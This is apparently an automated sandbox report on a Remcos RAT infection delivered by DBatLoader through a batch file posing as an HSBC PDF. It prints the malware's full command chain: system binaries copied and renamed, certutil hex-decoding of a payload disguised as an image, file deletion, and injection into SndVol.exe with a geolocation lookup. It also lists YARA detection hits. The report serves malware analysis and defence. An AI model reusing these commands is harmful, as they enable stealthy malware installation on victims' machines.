                                                                                        Nov 20, 2024 07:53:12.722042084 CET1224INData Raw: 4a 32 4f 6d 6c 39 37 57 56 7a 62 65 6c 73 34 4d 6a 72 7a 66 66 47 33 4e 48 69 45 2f 74 55 33 73 72 76 73 39 77 74 33 7a 6a 36 68 65 57 53 33 6f 72 6f 58 75 4d 6e 37 6c 66 6d 68 65 35 75 38 32 62 65 63 64 33 47 38 6b 66 64 51 65 62 39 36 32 48 72
                                                                                        Data Ascii: J2Oml97WVzbels4MjrzffG3NHiE/tU3srvs9wt3zj6heWS3oroXuMn7lfmhe5u82becd3G8kfdQeb962HrsvCG62LzZ99r3tDxRvqK5N/ha+r24d0cjSTZHqoVRSQuE/AiHyMkGIIqaSPJJKUpshanHvgWWhqHJZAocRh0KXgkwR+uHjIXUB3uFYB3cnYuaX0OZd1c6UrgWeuT94vfduFj+L3fx/i26w7qq/EG3h/kE+UP3iPzm
                                                                                        Nov 20, 2024 07:53:12.722058058 CET1236INData Raw: 33 63 54 4f 57 4c 33 74 37 79 64 2b 68 64 35 6d 76 76 74 2b 69 69 2b 53 6a 71 66 4f 6d 47 37 32 62 67 61 2b 76 61 36 38 4c 67 51 2b 30 56 35 55 7a 79 61 2b 34 72 34 74 44 68 34 75 31 34 34 6d 7a 70 31 2b 53 72 35 2f 48 73 33 65 61 59 37 34 76 6a
                                                                                        Data Ascii: 3cTOWL3t7yd+hd5mvvt+ii+SjqfOmG72bga+va68LgQ+0V5Uzya+4r4tDh4u144mzp1+Sr5/Hs3eaY74vjcSZ0G18SzyGvJSwe+SfgGyAifSB+GKshPRLzIyQiAhVQW5cktyMkKv0VjB2SFl0a2iWrKDAZEijpHeUfex7EaXNzomt9RnJ2c/ez7DHeYOo14z7oT/Td3rrgPPkx3lfv9tyO6HvtouJR6GzpduLA76znRexq8D3d4
                                                                                        Nov 20, 2024 07:53:12.727005959 CET1236INData Raw: 56 63 35 71 44 6c 6f 2f 41 7a 33 7a 50 6b 45 4f 56 51 33 68 54 7a 4b 75 68 35 38 48 6e 73 36 4f 43 72 34 35 77 63 6e 69 56 4d 49 4f 51 6a 6c 53 47 32 47 58 41 64 76 57 74 35 64 6f 4a 32 68 34 68 34 37 6e 7a 6f 75 4e 34 2b 35 76 76 64 36 76 48 64
                                                                                        Data Ascii: Vc5qDlo/Az3zPkEOVQ3hTzKuh58Hns6OCr45wcniVMIOQjlSG2GXAdvWt5doJ2h4h47nzouN4+5vvd6vHd6u7kJu0j6lv7JeZa5ZfzbtwN5vDnfCtIGPMdSBUcGewmhCeJGUopviTxHwoeIxd+c2Zr6neG6XP3wPmp6Kfcsetf4GTsGuch6Y7xZubR99QjWiMCF7EqNiMZJEwpgxbmI/Ab32l1dBt3hhhsd2Xioty43mP1X9/X9


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        1192.168.2.849710178.237.33.50808072C:\Windows\SysWOW64\SndVol.exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Nov 20, 2024 07:53:21.006829023 CET71OUTGET /json.gp HTTP/1.1
                                                                                        Host: geoplugin.net
                                                                                        Cache-Control: no-cache
                                                                                        Nov 20, 2024 07:53:21.627352953 CET1170INHTTP/1.1 200 OK
                                                                                        date: Wed, 20 Nov 2024 06:53:21 GMT
                                                                                        server: Apache
                                                                                        content-length: 962
                                                                                        content-type: application/json; charset=utf-8
                                                                                        cache-control: public, max-age=300
                                                                                        access-control-allow-origin: *
                                                                                        Data Raw: 7b 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 72 65 71 75 65 73 74 22 3a 22 38 2e 34 36 2e 31 32 33 2e 37 35 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 73 74 61 74 75 73 22 3a 32 30 30 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 64 65 6c 61 79 22 3a 22 31 6d 73 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 63 72 65 64 69 74 22 3a 22 53 6f 6d 65 20 6f 66 20 74 68 65 20 72 65 74 75 72 6e 65 64 20 64 61 74 61 20 69 6e 63 6c 75 64 65 73 20 47 65 6f 4c 69 74 65 32 20 64 61 74 61 20 63 72 65 61 74 65 64 20 62 79 20 4d 61 78 4d 69 6e 64 2c 20 61 76 61 69 6c 61 62 6c 65 20 66 72 6f 6d 20 3c 61 20 68 72 65 66 3d 27 68 74 74 70 73 3a 5c 2f 5c 2f 77 77 77 2e 6d 61 78 6d 69 6e 64 2e 63 6f 6d 27 3e 68 74 74 70 73 3a 5c 2f 5c 2f 77 77 77 2e 6d 61 78 6d 69 6e 64 2e 63 6f 6d 3c 5c 2f 61 3e 2e 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 63 69 74 79 22 3a 22 4e 65 77 20 59 6f 72 6b 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 72 65 67 69 6f 6e 22 3a 22 4e 65 77 20 59 6f 72 6b 22 2c 0a 20 20 22 67 65 6f [TRUNCATED]
                                                                                        Data Ascii: { "geoplugin_request":"8.46.123.75", "geoplugin_status":200, "geoplugin_delay":"1ms", "geoplugin_credit":"Some of the returned data includes GeoLite2 data created by MaxMind, available from <a href='https:\/\/www.maxmind.com'>https:\/\/www.maxmind.com<\/a>.", "geoplugin_city":"New York", "geoplugin_region":"New York", "geoplugin_regionCode":"NY", "geoplugin_regionName":"New York", "geoplugin_areaCode":"", "geoplugin_dmaCode":"501", "geoplugin_countryCode":"US", "geoplugin_countryName":"United States", "geoplugin_inEU":0, "geoplugin_euVATrate":false, "geoplugin_continentCode":"NA", "geoplugin_continentName":"North America", "geoplugin_latitude":"40.7123", "geoplugin_longitude":"-74.0068", "geoplugin_locationAccuracyRadius":"20", "geoplugin_timezone":"America\/New_York", "geoplugin_currencyCode":"USD", "geoplugin_currencySymbol":"$", "geoplugin_currencySymbol_UTF8":"$", "geoplugin_currencyConverter":0}


                                                                                        Statistics

                                                                                        CPU Usage

                                                                                        Click to jump to process

                                                                                        Memory Usage

                                                                                        Click to jump to process

                                                                                        High Level Behavior Distribution

                                                                                        Click to dive into process behavior distribution

                                                                                        Behavior

                                                                                        Click to jump to process

                                                                                        System Behavior

                                                                                        General

                                                                                        Target ID:0
                                                                                        Start time:01:53:06
                                                                                        Start date:20/11/2024
                                                                                        Path:C:\Windows\System32\cmd.exe
                                                                                        Wow64 process (32bit):false
                                                                                        Commandline:C:\Windows\system32\cmd.exe /c ""C:\Users\user\Desktop\USD470900_COPY_800BLHSBC882001.PDF.bat" "
                                                                                        Imagebase:0x7ff7a5000000
                                                                                        File size:289'792 bytes
                                                                                        MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                        Has elevated privileges:true
                                                                                        Has administrator privileges:true
                                                                                        Programmed in:C, C++ or other language
                                                                                        Reputation:high
                                                                                        Has exited:true

                                                                                        General

                                                                                        Target ID:1
                                                                                        Start time:01:53:06
                                                                                        Start date:20/11/2024
                                                                                        Path:C:\Windows\System32\conhost.exe
                                                                                        Wow64 process (32bit):false
                                                                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                        Imagebase:0x7ff6ee680000
                                                                                        File size:862'208 bytes
                                                                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                        Has elevated privileges:true
                                                                                        Has administrator privileges:true
                                                                                        Programmed in:C, C++ or other language
                                                                                        Reputation:high
                                                                                        Has exited:true

                                                                                        General

                                                                                        Target ID:3
                                                                                        Start time:01:53:06
                                                                                        Start date:20/11/2024
                                                                                        Path:C:\Windows\System32\extrac32.exe
                                                                                        Wow64 process (32bit):false
                                                                                        Commandline:C:\\Windows\\System32\\extrac32 /C /Y C:\\Windows\\System32\\cmd.exe "C:\\Users\\Public\\alpha.exe"
                                                                                        Imagebase:0x7ff699a50000
                                                                                        File size:35'328 bytes
                                                                                        MD5 hash:41330D97BF17D07CD4308264F3032547
                                                                                        Has elevated privileges:true
                                                                                        Has administrator privileges:true
                                                                                        Programmed in:C, C++ or other language
                                                                                        Reputation:moderate
                                                                                        Has exited:true

                                                                                        General

                                                                                        Target ID:4
                                                                                        Start time:01:53:07
                                                                                        Start date:20/11/2024
                                                                                        Path:C:\Users\Public\alpha.exe
                                                                                        Wow64 process (32bit):false
                                                                                        Commandline:C:\\Users\\Public\\alpha /c extrac32 /C /Y C:\\Windows\\System32\\certutil.exe C:\\Users\\Public\\kn.exe
                                                                                        Imagebase:0x7ff6a0e70000
                                                                                        File size:289'792 bytes
                                                                                        MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                        Has elevated privileges:true
                                                                                        Has administrator privileges:true
                                                                                        Programmed in:C, C++ or other language
                                                                                        Antivirus matches:
                                                                                        • Detection: 0%, ReversingLabs
                                                                                        Reputation:high
                                                                                        Has exited:true

                                                                                        General

                                                                                        Target ID:5
                                                                                        Start time:01:53:07
                                                                                        Start date:20/11/2024
                                                                                        Path:C:\Windows\System32\extrac32.exe
                                                                                        Wow64 process (32bit):false
                                                                                        Commandline:extrac32 /C /Y C:\\Windows\\System32\\certutil.exe C:\\Users\\Public\\kn.exe
                                                                                        Imagebase:0x7ff699a50000
                                                                                        File size:35'328 bytes
                                                                                        MD5 hash:41330D97BF17D07CD4308264F3032547
                                                                                        Has elevated privileges:true
                                                                                        Has administrator privileges:true
                                                                                        Programmed in:C, C++ or other language
                                                                                        Reputation:moderate
                                                                                        Has exited:true

                                                                                        General

                                                                                        Target ID:6
                                                                                        Start time:01:53:07
                                                                                        Start date:20/11/2024
                                                                                        Path:C:\Users\Public\alpha.exe
                                                                                        Wow64 process (32bit):false
                                                                                        Commandline:C:\\Users\\Public\\alpha /c C:\\Users\\Public\\kn -decodehex -F "C:\Users\user\Desktop\USD470900_COPY_800BLHSBC882001.PDF.bat" "C:\\Users\\Public\\AnyDesk.jpeg" 9
                                                                                        Imagebase:0x7ff6a0e70000
                                                                                        File size:289'792 bytes
                                                                                        MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                        Has elevated privileges:true
                                                                                        Has administrator privileges:true
                                                                                        Programmed in:C, C++ or other language
                                                                                        Reputation:high
                                                                                        Has exited:true

                                                                                        General

                                                                                        Target ID:7
                                                                                        Start time:01:53:07
                                                                                        Start date:20/11/2024
                                                                                        Path:C:\Users\Public\kn.exe
                                                                                        Wow64 process (32bit):false
                                                                                        Commandline:C:\\Users\\Public\\kn -decodehex -F "C:\Users\user\Desktop\USD470900_COPY_800BLHSBC882001.PDF.bat" "C:\\Users\\Public\\AnyDesk.jpeg" 9
                                                                                        Imagebase:0x7ff68fc00000
                                                                                        File size:1'651'712 bytes
                                                                                        MD5 hash:F17616EC0522FC5633151F7CAA278CAA
                                                                                        Has elevated privileges:true
                                                                                        Has administrator privileges:true
                                                                                        Programmed in:C, C++ or other language
                                                                                        Antivirus matches:
                                                                                        • Detection: 0%, ReversingLabs
                                                                                        Reputation:moderate
                                                                                        Has exited:true

                                                                                        General

                                                                                        Target ID:8
                                                                                        Start time:01:53:08
                                                                                        Start date:20/11/2024
                                                                                        Path:C:\Users\Public\alpha.exe
                                                                                        Wow64 process (32bit):false
                                                                                        Commandline:C:\\Users\\Public\\alpha /c C:\\Users\\Public\\kn -decodehex -F "C:\\Users\\Public\\AnyDesk.jpeg" "C:\\Users\\Public\\Libraries\\AnyDesk.PIF" 12
                                                                                        Imagebase:0x7ff6a0e70000
                                                                                        File size:289'792 bytes
                                                                                        MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                        Has elevated privileges:true
                                                                                        Has administrator privileges:true
                                                                                        Programmed in:C, C++ or other language
                                                                                        Reputation:high
                                                                                        Has exited:true

                                                                                        General

                                                                                        Target ID:9
                                                                                        Start time:01:53:09
                                                                                        Start date:20/11/2024
                                                                                        Path:C:\Users\Public\kn.exe
                                                                                        Wow64 process (32bit):false
                                                                                        Commandline:C:\\Users\\Public\\kn -decodehex -F "C:\\Users\\Public\\AnyDesk.jpeg" "C:\\Users\\Public\\Libraries\\AnyDesk.PIF" 12
                                                                                        Imagebase:0x7ff68fc00000
                                                                                        File size:1'651'712 bytes
                                                                                        MD5 hash:F17616EC0522FC5633151F7CAA278CAA
                                                                                        Has elevated privileges:true
                                                                                        Has administrator privileges:true
                                                                                        Programmed in:C, C++ or other language
                                                                                        Reputation:moderate
                                                                                        Has exited:true

                                                                                        General

                                                                                        Target ID:10
                                                                                        Start time:01:53:09
                                                                                        Start date:20/11/2024
                                                                                        Path:C:\Users\Public\Libraries\AnyDesk.PIF
                                                                                        Wow64 process (32bit):true
                                                                                        Commandline:C:\Users\Public\Libraries\AnyDesk.PIF
                                                                                        Imagebase:0x400000
                                                                                        File size:1'226'752 bytes
                                                                                        MD5 hash:DF6F291F617D9DBAE8F32FB11ECD59C1
                                                                                        Has elevated privileges:true
                                                                                        Has administrator privileges:true
                                                                                        Programmed in:Borland Delphi
                                                                                        Yara matches:
                                                                                        • Rule: JoeSecurity_DBatLoader, Description: Yara detected DBatLoader, Source: 0000000A.00000003.1426879864.000000007FC50000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                        • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 0000000A.00000002.1519993639.000000007E810000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                        • Rule: Windows_Trojan_Remcos_b296e965, Description: unknown, Source: 0000000A.00000002.1519993639.000000007E810000.00000004.00001000.00020000.00000000.sdmp, Author: unknown
                                                                                        • Rule: JoeSecurity_DBatLoader, Description: Yara detected DBatLoader, Source: 0000000A.00000003.1427511863.000000007F920000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                        • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 0000000A.00000002.1498580149.0000000002DB7000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                        • Rule: Windows_Trojan_Remcos_b296e965, Description: unknown, Source: 0000000A.00000002.1498580149.0000000002DB7000.00000040.00001000.00020000.00000000.sdmp, Author: unknown
                                                                                        Antivirus matches:
                                                                                        • Detection: 100%, Joe Sandbox ML
                                                                                        • Detection: 32%, ReversingLabs
                                                                                        Reputation:low
                                                                                        Has exited:true

                                                                                        General

                                                                                        Target ID:11
                                                                                        Start time:01:53:09
                                                                                        Start date:20/11/2024
                                                                                        Path:C:\Users\Public\alpha.exe
                                                                                        Wow64 process (32bit):false
                                                                                        Commandline:C:\\Users\\Public\\alpha /c del /q "C:\Users\Public\kn.exe" / A / F / Q / S
                                                                                        Imagebase:0x7ff6a0e70000
                                                                                        File size:289'792 bytes
                                                                                        MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                        Has elevated privileges:true
                                                                                        Has administrator privileges:true
                                                                                        Programmed in:C, C++ or other language
                                                                                        Reputation:high
                                                                                        Has exited:true

                                                                                        General

                                                                                        Target ID:12
                                                                                        Start time:01:53:09
                                                                                        Start date:20/11/2024
                                                                                        Path:C:\Users\Public\alpha.exe
                                                                                        Wow64 process (32bit):false
                                                                                        Commandline:C:\\Users\\Public\\alpha /c del /q "C:\Users\Public\AnyDesk.jpeg" / A / F / Q / S
                                                                                        Imagebase:0x7ff6a0e70000
                                                                                        File size:289'792 bytes
                                                                                        MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                        Has elevated privileges:true
                                                                                        Has administrator privileges:true
                                                                                        Programmed in:C, C++ or other language
                                                                                        Reputation:high
                                                                                        Has exited:true

                                                                                        General

                                                                                        Target ID:14
                                                                                        Start time:01:53:14
                                                                                        Start date:20/11/2024
                                                                                        Path:C:\Windows\SysWOW64\cmd.exe
                                                                                        Wow64 process (32bit):true
                                                                                        Commandline:C:\Windows\system32\cmd.exe /c ""C:\Users\Public\Libraries\hgkvgoaF.cmd" "
                                                                                        Imagebase:0xa40000
                                                                                        File size:236'544 bytes
                                                                                        MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                                        Has elevated privileges:true
                                                                                        Has administrator privileges:true
                                                                                        Programmed in:C, C++ or other language
                                                                                        Has exited:true

                                                                                        General

                                                                                        Target ID:15
                                                                                        Start time:01:53:14
                                                                                        Start date:20/11/2024
                                                                                        Path:C:\Windows\System32\conhost.exe
                                                                                        Wow64 process (32bit):false
                                                                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                        Imagebase:0x7ff6ee680000
                                                                                        File size:862'208 bytes
                                                                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                        Has elevated privileges:true
                                                                                        Has administrator privileges:true
                                                                                        Programmed in:C, C++ or other language
                                                                                        Has exited:true

                                                                                        General

                                                                                        Target ID:16
                                                                                        Start time:01:53:15
                                                                                        Start date:20/11/2024
                                                                                        Path:C:\Windows\SysWOW64\esentutl.exe
                                                                                        Wow64 process (32bit):true
                                                                                        Commandline:C:\\Windows\\System32\\esentutl /y C:\\Windows\\System32\\cmd.exe /d C:\\Users\\Public\\alpha.pif /o
                                                                                        Imagebase:0x380000
                                                                                        File size:352'768 bytes
                                                                                        MD5 hash:5F5105050FBE68E930486635C5557F84
                                                                                        Has elevated privileges:true
                                                                                        Has administrator privileges:true
                                                                                        Programmed in:C, C++ or other language
                                                                                        Has exited:true

                                                                                        General

                                                                                        Target ID:17
                                                                                        Start time:01:53:15
                                                                                        Start date:20/11/2024
                                                                                        Path:C:\Windows\SysWOW64\esentutl.exe
                                                                                        Wow64 process (32bit):true
                                                                                        Commandline:C:\\Windows\\System32\\esentutl /y C:\\Windows\\System32\\ping.exe /d C:\\Users\\Public\\xpha.pif /o
                                                                                        Imagebase:0x380000
                                                                                        File size:352'768 bytes
                                                                                        MD5 hash:5F5105050FBE68E930486635C5557F84
                                                                                        Has elevated privileges:true
                                                                                        Has administrator privileges:true
                                                                                        Programmed in:C, C++ or other language
                                                                                        Has exited:true

                                                                                        General

                                                                                        Target ID:18
                                                                                        Start time:01:53:15
                                                                                        Start date:20/11/2024
                                                                                        Path:C:\Windows\SysWOW64\esentutl.exe
                                                                                        Wow64 process (32bit):true
                                                                                        Commandline:C:\\Windows\\System32\\esentutl.exe /y C:\Users\Public\Libraries\AnyDesk.PIF /d C:\\Users\\Public\\Libraries\\Faogvkgh.PIF /o
                                                                                        Imagebase:0x380000
                                                                                        File size:352'768 bytes
                                                                                        MD5 hash:5F5105050FBE68E930486635C5557F84
                                                                                        Has elevated privileges:true
                                                                                        Has administrator privileges:true
                                                                                        Programmed in:C, C++ or other language
                                                                                        Has exited:true

                                                                                        General

                                                                                        Target ID:19
                                                                                        Start time:01:53:15
                                                                                        Start date:20/11/2024
                                                                                        Path:C:\Windows\System32\conhost.exe
                                                                                        Wow64 process (32bit):false
                                                                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                        Imagebase:0x7ff6ee680000
                                                                                        File size:862'208 bytes
                                                                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                        Has elevated privileges:true
                                                                                        Has administrator privileges:true
                                                                                        Programmed in:C, C++ or other language
                                                                                        Has exited:true

                                                                                        General

                                                                                        Target ID:20
                                                                                        Start time:01:53:16
                                                                                        Start date:20/11/2024
                                                                                        Path:C:\Windows\SysWOW64\SndVol.exe
                                                                                        Wow64 process (32bit):true
                                                                                        Commandline:C:\Windows\System32\SndVol.exe
                                                                                        Imagebase:0x790000
                                                                                        File size:226'712 bytes
                                                                                        MD5 hash:BD4A1CC3429ED1251E5185A72501839B
                                                                                        Has elevated privileges:true
                                                                                        Has administrator privileges:true
                                                                                        Programmed in:C, C++ or other language
                                                                                        Yara matches:
                                                                                        • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000014.00000002.3879565990.000000001C118000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                        • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000014.00000002.3868017269.0000000002CF0000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                                        • Rule: Windows_Trojan_Remcos_b296e965, Description: unknown, Source: 00000014.00000002.3868017269.0000000002CF0000.00000040.00000400.00020000.00000000.sdmp, Author: unknown
                                                                                        • Rule: REMCOS_RAT_variants, Description: unknown, Source: 00000014.00000002.3868017269.0000000002CF0000.00000040.00000400.00020000.00000000.sdmp, Author: unknown
                                                                                        • Rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_EventViewer, Description: detects Windows exceutables potentially bypassing UAC using eventvwr.exe, Source: 00000014.00000002.3868017269.0000000002CF0000.00000040.00000400.00020000.00000000.sdmp, Author: ditekSHen
                                                                                        Has exited:false

                                                                                        General

                                                                                        Target ID:22
                                                                                        Start time:01:53:29
                                                                                        Start date:20/11/2024
                                                                                        Path:C:\Users\Public\Libraries\Faogvkgh.PIF
                                                                                        Wow64 process (32bit):true
                                                                                        Commandline:"C:\Users\Public\Libraries\Faogvkgh.PIF"
                                                                                        Imagebase:0x400000
                                                                                        File size:1'226'752 bytes
                                                                                        MD5 hash:DF6F291F617D9DBAE8F32FB11ECD59C1
                                                                                        Has elevated privileges:false
                                                                                        Has administrator privileges:false
                                                                                        Programmed in:Borland Delphi
                                                                                        Antivirus matches:
                                                                                        • Detection: 100%, Joe Sandbox ML
                                                                                        • Detection: 32%, ReversingLabs
                                                                                        Has exited:true

                                                                                        General

                                                                                        Target ID:23
                                                                                        Start time:01:53:30
                                                                                        Start date:20/11/2024
                                                                                        Path:C:\Windows\SysWOW64\SndVol.exe
                                                                                        Wow64 process (32bit):true
                                                                                        Commandline:C:\Windows\System32\SndVol.exe
                                                                                        Imagebase:0x790000
                                                                                        File size:226'712 bytes
                                                                                        MD5 hash:BD4A1CC3429ED1251E5185A72501839B
                                                                                        Has elevated privileges:false
                                                                                        Has administrator privileges:false
                                                                                        Programmed in:C, C++ or other language
                                                                                        Yara matches:
                                                                                        • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000017.00000002.1635427252.0000000002C00000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                                        • Rule: Windows_Trojan_Remcos_b296e965, Description: unknown, Source: 00000017.00000002.1635427252.0000000002C00000.00000040.00000400.00020000.00000000.sdmp, Author: unknown
                                                                                        • Rule: REMCOS_RAT_variants, Description: unknown, Source: 00000017.00000002.1635427252.0000000002C00000.00000040.00000400.00020000.00000000.sdmp, Author: unknown
                                                                                        • Rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_EventViewer, Description: detects Windows exceutables potentially bypassing UAC using eventvwr.exe, Source: 00000017.00000002.1635427252.0000000002C00000.00000040.00000400.00020000.00000000.sdmp, Author: ditekSHen
                                                                                        • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000017.00000002.1661654615.000000002AB37000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                        Has exited:true

                                                                                        General

                                                                                        Target ID:24
                                                                                        Start time:01:53:37
                                                                                        Start date:20/11/2024
                                                                                        Path:C:\Users\Public\Libraries\Faogvkgh.PIF
                                                                                        Wow64 process (32bit):true
                                                                                        Commandline:"C:\Users\Public\Libraries\Faogvkgh.PIF"
                                                                                        Imagebase:0x400000
                                                                                        File size:1'226'752 bytes
                                                                                        MD5 hash:DF6F291F617D9DBAE8F32FB11ECD59C1
                                                                                        Has elevated privileges:false
                                                                                        Has administrator privileges:false
                                                                                        Programmed in:Borland Delphi
                                                                                        Has exited:true

                                                                                        General

                                                                                        Target ID:25
                                                                                        Start time:01:53:38
                                                                                        Start date:20/11/2024
                                                                                        Path:C:\Windows\SysWOW64\SndVol.exe
                                                                                        Wow64 process (32bit):true
                                                                                        Commandline:C:\Windows\System32\SndVol.exe
                                                                                        Imagebase:0x790000
                                                                                        File size:226'712 bytes
                                                                                        MD5 hash:BD4A1CC3429ED1251E5185A72501839B
                                                                                        Has elevated privileges:false
                                                                                        Has administrator privileges:false
                                                                                        Programmed in:C, C++ or other language
                                                                                        Yara matches:
                                                                                        • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000019.00000002.1714791876.0000000000647000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                        • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000019.00000002.1714933699.00000000027D0000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                                        • Rule: Windows_Trojan_Remcos_b296e965, Description: unknown, Source: 00000019.00000002.1714933699.00000000027D0000.00000040.00000400.00020000.00000000.sdmp, Author: unknown
                                                                                        • Rule: REMCOS_RAT_variants, Description: unknown, Source: 00000019.00000002.1714933699.00000000027D0000.00000040.00000400.00020000.00000000.sdmp, Author: unknown
                                                                                        • Rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_EventViewer, Description: detects Windows exceutables potentially bypassing UAC using eventvwr.exe, Source: 00000019.00000002.1714933699.00000000027D0000.00000040.00000400.00020000.00000000.sdmp, Author: ditekSHen
                                                                                        Has exited:true

                                                                                        Disassembly

                                                                                        Reset < >

                                                                                          Execution Graph

                                                                                          Execution Coverage:5.5%
                                                                                          Dynamic/Decrypted Code Coverage:0%
                                                                                          Signature Coverage:25.8%
                                                                                          Total number of Nodes:1399
                                                                                          Total number of Limit Nodes:30
                                                                                          execution_graph 16789 7ff6a0e95b30 16797 7ff6a0e95a6c 16789->16797 16792 7ff6a0e95b83 16793 7ff6a0e95b54 16793->16792 16803 7ff6a0e96224 16793->16803 16798 7ff6a0e95a9e 16797->16798 16799 7ff6a0e95aa3 16797->16799 16815 7ff6a0e95f10 GetCurrentThreadId 16798->16815 16802 7ff6a0e95ac9 GetCurrentThreadId 16799->16802 16817 7ff6a0e96124 16799->16817 16802->16792 16802->16793 16804 7ff6a0e95b73 16803->16804 16805 7ff6a0e96239 16803->16805 16804->16792 16809 7ff6a0e96f88 16804->16809 16821 7ff6a0e960c4 16805->16821 16810 7ff6a0e96fb9 16809->16810 16814 7ff6a0e96fcf 16809->16814 16811 7ff6a0e9707b 16810->16811 16813 7ff6a0e96874 3 API calls 16810->16813 16811->16792 16813->16814 16814->16811 17060 7ff6a0e96e34 16814->17060 16816 7ff6a0e95f50 16815->16816 16816->16799 16818 7ff6a0e96153 16817->16818 16819 7ff6a0e96205 16817->16819 16818->16819 16820 7ff6a0e961de memcpy_s 16818->16820 16819->16802 16820->16819 16822 7ff6a0e960ef 16821->16822 16823 7ff6a0e960dc 16821->16823 16822->16804 16825 7ff6a0e95f74 GetCurrentThreadId 16822->16825 16827 7ff6a0e954b0 GetCurrentProcessId 16823->16827 16826 7ff6a0e95faf 16825->16826 16826->16804 16856 7ff6a0e833f0 16827->16856 16832 7ff6a0e95551 16865 7ff6a0e95edc 16832->16865 16833 7ff6a0e9555d 16868 7ff6a0e97524 WaitForSingleObjectEx 16833->16868 16836 7ff6a0e95556 16910 7ff6a0e88f80 16836->16910 16841 7ff6a0e955a4 16844 7ff6a0e955cc 16841->16844 16845 7ff6a0e96d1c 14 API calls 16841->16845 16846 7ff6a0e955f8 16844->16846 16847 7ff6a0e955db 16844->16847 16845->16844 16855 7ff6a0e955f6 16846->16855 16918 7ff6a0e9670c 16846->16918 16848 7ff6a0e96d1c 14 API calls 16847->16848 16848->16855 16851 7ff6a0e9561f 16851->16836 16906 7ff6a0e95740 CloseHandle 16851->16906 16853 7ff6a0e96d1c 14 API calls 16853->16855 16855->16851 16902 7ff6a0e96a04 ReleaseMutex 16855->16902 16857 7ff6a0e83433 CreateMutexExW 16856->16857 16858 7ff6a0e83421 16856->16858 16860 7ff6a0e9758c 16857->16860 16936 7ff6a0e83684 _vsnwprintf 16858->16936 16861 7ff6a0e975ae GetLastError 16860->16861 16862 7ff6a0e95547 16860->16862 16863 7ff6a0e95740 16 API calls 16861->16863 16862->16832 16862->16833 16864 7ff6a0e975c4 SetLastError 16863->16864 16864->16862 16938 7ff6a0e95e68 GetLastError 16865->16938 16869 7ff6a0e97552 16868->16869 16870 7ff6a0e9556c 16868->16870 16869->16870 17000 7ff6a0e959f4 16869->17000 16872 7ff6a0e9711c 16870->16872 16873 7ff6a0e9716c 16872->16873 16874 7ff6a0e971ed OpenSemaphoreW 16873->16874 16875 7ff6a0e9723a 16874->16875 16876 7ff6a0e9720d GetLastError 16874->16876 17006 7ff6a0e9627c WaitForSingleObject 16875->17006 16877 7ff6a0e97222 16876->16877 16898 7ff6a0e97233 16876->16898 17003 7ff6a0e96cfc 16877->17003 16881 7ff6a0e97382 16883 7ff6a0e88f80 7 API calls 16881->16883 16882 7ff6a0e97257 16885 7ff6a0e96d1c 14 API calls 16882->16885 16886 7ff6a0e95585 16883->16886 16884 7ff6a0e95740 16 API calls 16884->16881 16885->16898 16886->16841 16899 7ff6a0e96d1c 16886->16899 16887 7ff6a0e97277 OpenSemaphoreW 16887->16877 16889 7ff6a0e9731e 16887->16889 16890 7ff6a0e9627c 23 API calls 16889->16890 16891 7ff6a0e9732b 16890->16891 16892 7ff6a0e97331 16891->16892 16893 7ff6a0e97356 16891->16893 16894 7ff6a0e96d1c 14 API calls 16892->16894 16895 7ff6a0e95740 16 API calls 16893->16895 16896 7ff6a0e9734c 16894->16896 16895->16898 16897 7ff6a0e95740 16 API calls 16896->16897 16897->16898 16898->16881 16898->16884 16900 7ff6a0e96c5c 14 API calls 16899->16900 16901 7ff6a0e96d45 16900->16901 16901->16841 16903 7ff6a0e96a27 16902->16903 16904 7ff6a0e96a18 16902->16904 16903->16851 17026 7ff6a0e97504 16904->17026 16907 7ff6a0e95754 16906->16907 16909 7ff6a0e95763 16906->16909 16908 7ff6a0e97504 15 API calls 16907->16908 16908->16909 